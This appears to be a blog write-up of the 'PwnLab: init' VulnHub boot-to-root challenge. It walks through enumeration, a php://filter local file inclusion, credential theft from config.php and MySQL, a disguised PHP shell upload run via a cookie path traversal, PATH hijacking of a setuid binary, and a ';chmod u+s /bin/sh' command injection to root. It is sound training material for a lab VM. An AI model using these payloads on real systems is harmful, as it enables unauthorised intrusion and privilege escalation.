PwnLab: init

Location

https://download.vulnhub.com/pwnlab/pwnlab_init.ova

Description

Welcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read the flag.

Difficulty: Low
Flag: /root/flag.txt

Enumeration

nmap -T4 -sV -p- 192.168.110.2

nmap

It looks like 2 well-known ports and 2 registered ports are open. I’ll start with the website on port 80 and try dirb and nikto to get some more information.

dirb http://192.168.110.2
+ http://192.168.110.2/index.php (CODE:200|SIZE:332) 
+ http://192.168.110.2/server-status (CODE:403|SIZE:301) 

---- Entering directory: http://192.168.110.2/images/ ----
---- Entering directory: http://192.168.110.2/upload/ ----
nikto -h http://192.168.110.2

nikto

  • /login.php
  • /config.php
  • /index.php

I first checked the upload page, but it was protected by the login. Because I didn’t had any credentials, I tried to brute force my way in with the rockyou wordlist. But after some waiting, it turned up with nothing. In the meantime I tried to check out config.php, but that was also a dead-end. After looking at the URL, I noticed the use of the parameter ‘/?page=’. My first guess was to look for a path traversal weakness. Nothing. My second try was to get a LFI. I googled for some php exploits and stumbled onto https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ and http://securityidiots.com/Web-Pentest/LFI.

Local File Inclusion

After a few tries I finally discovered that I could use the PHP wrapper php://filter. Because the output is encoded using base64, I’ll need to decode the output.

?file=php://filter/convert.base64-encode/resource=index.php

This will let me to get the source of the PHP files on the server.

=page

Time to load this up into burpsuite and let it do the heavy lifting. After looking at the found php pages, I got credentials from config.php.

repeater

<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

From reading upload.php it was clear that there were some restrictions.

Only 4 file types were allowed:

$whitelist = array(".jpg",".jpeg",".gif",".png");

Also there were MIME restrictions:

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png')

And finally the file isn’t allowed to have multiple file types:

if(substr_count($filetype, '/')>1)

When I read the index.php file it seemed that there was also a ‘lang’ parameter which possible had a LFI vulnerability. At this moment I don’t know if this can help me.

include("lang/".$_COOKIE['lang']);

MySQL

With the found credentials I logged in the MySQL server.

root@PlanetMars:~# mysql --host=192.168.110.2 --port=3306 --user=root --password
Enter password: 
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 52
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.00 sec)

mysql> use Users;
Database changed

mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.00 sec)

mysql> 

root@PlanetMars:~# echo 'Sld6WHVCSkpOeQ==' | base64 -d
JWzXuBJJNy
root@PlanetMars:~# echo 'U0lmZHNURW42SQ==' | base64 -d
SIfdsTEn6I
root@PlanetMars:~# echo 'aVN2NVltMkdSbw==' | base64 -d
iSv5Ym2GRo

Uploading a dirty file

I try the first credentials in the list: kent.

upload

Since I know the restrictions of the upload.php file, I know how to adjust my php file.
I tried to upload the file and change the header to both JPG as JPEG, but for some reason that didn’t work. Changing the header to GIF worked like a charm.

shell.JPG

Reversed shell

Earlier I found a LFI vulnerability in the ‘lang’ parameter. Maybe I can use this to execute the uploaded php file. After altering the cookie to ‘lang=../../../../../../var/www/html/upload/f3035846cc279a1aff73b7c2c25367b9.gif’ I got my reversed shell.

31337.JPG

First let’s get a TTY shell.

python -c 'import pty;pty.spawn("/bin/bash");'
cat /etc/passwd
..
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash

Looks like there are 4 users. One of them wasn’t in the MySQL database. ‘john’. Because I have the credentials of the 3 other users, I’ll log in with these.

www-data@pwnlab:/home$ su kent
su kent
Password: JWzXuBJJNy

kent@pwnlab:/home$ 
cd kent
kent@pwnlab:~$ ls -lah
ls -lah
total 20K
drwxr-x--- 2 kent kent 4.0K Mar 17 10:06 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 kent kent 220 Mar 17 10:06 .bash_logout
-rw-r--r-- 1 kent kent 3.5K Mar 17 10:06 .bashrc
-rw-r--r-- 1 kent kent 675 Mar 17 10:06 .profile

kent@pwnlab:~$ su mike 
Password: SIfdsTEn6I
su: Authentication failure

kent@pwnlab:~$ su kane
Password: iSv5Ym2GRo
kane@pwnlab:/home/kent$ cd ..
kane@pwnlab:/home$ cd kane
kane@pwnlab:~$ ls -lah
total 28K
drwxr-x--- 2 kane kane 4.0K Mar 17 13:04 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 kane kane 220 Mar 17 10:09 .bash_logout
-rw-r--r-- 1 kane kane 3.5K Mar 17 10:09 .bashrc
-rwsr-sr-x 1 mike mike 5.1K Mar 17 13:04 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 10:09 .profile

A binary file named msgmike. When I run it I get:

cat: /home/mike/msg.txt: No such file or directory
strings msgmike
cat /home/mike/msg.txt

So it runs cat, but without an absolute path. By adjusting PATH to ‘.’ it will let me run my own cat binary with ‘/bin/sh’ inside.

kane@pwnlab:/tmp$ echo '/bin/sh' > cat
kane@pwnlab:/tmp$ export PATH=.
kane@pwnlab:/tmp$ /home/kane/msgmike
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:usr/bin:/sbin:/bin
$ id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
mike@pwnlab:/$ cd /home/mike
mike@pwnlab:/home/mike$ ls -lah
total 28K
drwxr-x--- 2 mike mike 4.0K Mar 17 15:19 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 mike mike 220 Mar 17 10:08 .bash_logout
-rw-r--r-- 1 mike mike 3.5K Mar 17 10:08 .bashrc
-rwsr-sr-x 1 root root 5.3K Mar 17 13:07 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 10:08 .profile
mike@pwnlab:/home/mike$

Another binary.

mike@pwnlab:/home/mike$ ./msg2root
Message for root: ;whoami
root
strings msg2root
..
Message for root: 
/bin/echo %s >> /root/messages.txt
..

Alright. It echoes everything I feed it and run it as root.

$ ./msg2root
Message for root: ;chmod u+s /bin/sh
mike@pwnlab:/home/mike$ /bin/sh
# id
uid=1002(mike) gid=1002(mike) euid=0(root) groups=1002(mike),1003(kane)
# cd /root
# ls
flag.txt messages.txt
# cat flag.txt

flag.JPG

Conclusion

This was an excellent challenge. The description said it was easy, but it gave me a run for my money (ok – it’s free – but you know what I mean).

Advertenties